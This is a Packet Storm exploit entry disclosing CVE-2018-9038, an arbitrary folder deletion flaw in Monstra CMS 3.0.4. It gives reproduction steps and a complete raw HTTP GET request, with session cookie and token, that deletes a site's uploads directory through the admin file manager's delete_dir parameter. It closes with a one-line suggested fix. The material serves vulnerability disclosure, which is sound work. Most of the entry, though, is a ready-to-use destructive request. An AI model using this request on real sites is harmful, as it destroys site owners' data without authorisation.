Monstra CMS 3.0.4 Arbitrary Folder Deletion

Type packetstorm
Reporter Wenming Jiang
Modified 2018-04-25T00:00:00


                                            `# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete folder via an get request  
# Date: 2018-03-26  
# Exploit Author: Wenming Jiang  
# Vendor Homepage:  
# Software Link:  
# Version: 3.0.4  
# Tested on: macos 10.12.6, php 5.6, apache2.2.29  
# CVE :CVE-2018-9038  
Monstra CMS 3.0.4 allows remote attackers to delete folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.  
Steps to Reproduce:  
1aLog in as a user with page editing permissions  
2aRequest http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads  
3aThe uploads folder will be deleted.  
Poc code:  
GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1  
Host: localhost:8000  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/  
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7  
Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699  
Connection: close  
Vulnerability Type:  
Insecure Permissions  
Expected Behavior:  
deleted uploads folder  
Possible Solutions:  
Strictly filter the delete_dir parameter and replace './' with '_/'